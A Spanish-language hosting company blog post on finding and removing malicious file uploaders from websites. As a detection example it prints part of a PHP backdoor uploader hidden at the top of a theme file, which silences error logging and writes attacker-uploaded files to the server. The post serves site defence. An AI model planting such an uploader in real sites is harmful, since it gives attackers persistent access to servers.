El blog de Neothek
+1 872 244 4628
  • soporte@neothek.com
  • Síguenos
    • Twitter
    • Facebook
    • YouTube
    • Google +
No Result
View All Result
  • Web hosting
  • Diseño Web
  • Dominios
  • Seguridad
  • E-mail
  • Diseño Gráfico
  • Web hosting
  • Diseño Web
  • Dominios
  • Seguridad
  • E-mail
  • Diseño Gráfico
No Result
View All Result
El blog de Neothek
No Result
View All Result
Inicio Seguridad

Buscar y encontrar cargadores de archivos maliciosos en tu web

por Equipo editorial
julio 5, 2021
en Seguridad, Sitios web
0 0
0
Buscar y encontrar cargadores de archivos maliciosos en tu web
0
SHARES
27
VISTAS
Share on FacebookShare on Twitter

¿Qué es un cargador de archivos malicioso?

Un cargador de archivos malicioso es un archivo o secuencia de comandos que permite a un atacante cargar archivos adicionales con el propósito de un uso malicioso. Los cargadores maliciosos generalmente permitirán que se cargue cualquier archivo en el sitio web sin ningún control de seguridad, lo que crea un gran riesgo para el sitio web. Un cargador puede verse como un código de sitio normal o puede estar ofuscado (oculto intencionalmente para hacer que el código sea ambiguo). Puede ser un archivo independiente o puede insertarse en un archivo de sitio normal, ya sea dentro de archivos centrales, archivos de complementos o archivos de temas.

Determinar si su sitio está infectado

Un cargador de archivos por sí solo es difícil de detectar a partir de una revisión casual de los archivos del sitio. Por lo general, el propietario de un sitio recibe una alerta sobre la presencia de archivos maliciosos más obvios, ya sean páginas de spam, enlaces de spam o redireccionamientos maliciosos, y una revisión de los archivos del sitio encuentra un cargador de archivos malicioso escondido en algún lugar dentro de los archivos del sitio.

Encontrar y eliminar el cargador de archivos malintencionado

La eliminación de cargadores de archivos maliciosos requiere un análisis del código del sitio. Los cargadores de archivos generalmente se encuentran dentro de los archivos php en el servidor web. Pueden insertarse en su núcleo, complemento o archivos de tema, o pueden ser un archivo independiente. Los cargadores de archivos maliciosos se pueden encontrar en cualquier directorio de acceso público en su servidor.

A veces, el cargador de archivos maliciosos está ofuscado y no parece que haga nada específico a primera vista. Es posible que deba decodificar la ofuscación para determinar qué está haciendo el archivo. El código ofuscado puede contener lo siguiente.

base64_decode(...aW5wdXQgdHlwZT0iZmlsZSI=...)

Otras veces, el código será una combinación de html y php y tendrá referencias a los archivos que se cargan. Un script de carga de archivos no oculto generalmente contiene un formulario con un tipo de campo como tipo de entrada = “archivo” dentro de él. Sin embargo, no todos los scripts de carga son maliciosos, por lo que determinar si un archivo es malicioso, desprotegido o sospechoso de alguna otra manera requerirá un análisis del código circundante.

Para eliminar el cargador de archivos, determine qué archivo contiene los scripts de carga y elimine el archivo o el código dentro del archivo válido. La secuencia de comandos de carga de archivos suele ser un formulario que utiliza el tipo de entrada de archivo para seleccionar el archivo del atacante.

A continuación, se muestra un ejemplo de un cargador de archivos adjunto al principio de un archivo de tema.

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);

Puede buscar en los archivos de su sitio cualquier entrada de formulario que tenga un tipo de entrada = archivo. Una forma no confusa puede tener un aspecto similar a esto. Como todo es código HTML válido, es posible que los escáneres de virus no detecten intenciones maliciosas.

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="AnyNameHere" id="AnyNameHere">
    <input type="submit" value="Upload Image" name="submit">
</form>

Más allá del cargador de archivos malicioso

Si encuentra una secuencia de comandos de carga de archivos maliciosa en su sitio web, es importante no solo determinar cómo se colocó ese archivo en su sitio, sino también encontrar otras secuencias de comandos maliciosas en su sitio. Los atacantes a menudo colocan más de un script de carga en un sitio y, a menudo, se combinan con más ataques maliciosos, como redireccionamientos maliciosos , páginas de spam o desfiguraciones.

También es importante determinar cómo se vio comprometido el sitio. Es importante revisar todo el sitio.

Neothek ofrece servicios de web hosting, registro de dominios, correo electrónico, certificados SSL, diseño de páginas web y diseño gráfico.

ADVERTISEMENT

BLOG20

También te puede interesar...

  • Eliminar páginas de spam de sitios de WordPress
  • ¿Cómo un atacante puede inyectar scripts maliciosos en tu sitio web?
  • 12 razones por las que tu sitio web es lento y cómo solucionarlo
  • Eliminar código malicioso de un mailer o remitente en tu sitio web
  • ¿Qué es HTTPS y por qué es tan importante?
  • ¿Por qué las copias de seguridad son tan importantes para la seguridad de WordPress?
  • ¿Qué es el malware?
  • Cómo redirigir HTTP a HTTPS en WordPress
  • ¿Mi sitio de WordPress ha sido pirateado? Como revisar
  • Comparativa de Plugins WordPress WAF
ShareTweetShare
ADVERTISEMENT

Related Posts

Complementos gratuitos de WordPress para su sitio en 2022 – Parte 1
Sitios web

Complementos gratuitos de WordPress para su sitio en 2022 – Parte 2

junio 24, 2022
Complementos gratuitos de WordPress para su sitio en 2022 – Parte 1
Sitios web

Complementos gratuitos de WordPress para su sitio en 2022 – Parte 1

junio 22, 2022
Cómo optimizar WordPress admin-ajax.php
Sitios web

Cómo optimizar WordPress admin-ajax.php

junio 10, 2022
¿Cómo tener menos solicitudes HTTP y aumentar la velocidad del sitio en WordPress?
Sitios web

¿Cómo tener menos solicitudes HTTP y aumentar la velocidad del sitio en WordPress?

junio 8, 2022
¿Por qué vale la pena invertir en un Sitio Web Profesional? – Parte1
Sitios web

¿Por qué vale la pena invertir en un Sitio Web Profesional? – Parte 2

mayo 23, 2022
¿Por qué vale la pena invertir en un Sitio Web Profesional? – Parte1
Sitios web

¿Por qué vale la pena invertir en un Sitio Web Profesional? – Parte1

mayo 20, 2022

Recomendado:

Mejora dramáticamente el rendimiento de tu web con PHP 7

Mejora dramáticamente el rendimiento de tu web con PHP 7

octubre 12, 2018
heartbleed bug Fallo de Seguridad OpenSSL

¿Como asegurar tus cuentas?

junio 4, 2015
Joomla y PHP 7 ¿Qué beneficios traen?

Joomla y PHP 7 ¿Qué beneficios traen?

agosto 2, 2018
Consideraciones al elegir una plataforma de comercio electrónico

Consideraciones al elegir una plataforma de comercio electrónico

diciembre 9, 2020
ADVERTISEMENT

© 2019 Neothek.com

No Result
View All Result
  • Facebook Demo
  • Inicio
  • My Instagram Feed Demo
  • Neothek
  • Nosotros

© 2022 JNews - Premium WordPress news & magazine theme by Jegtheme.

Welcome Back!

Login to your account below

Forgotten Password?

Create New Account!

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Posting....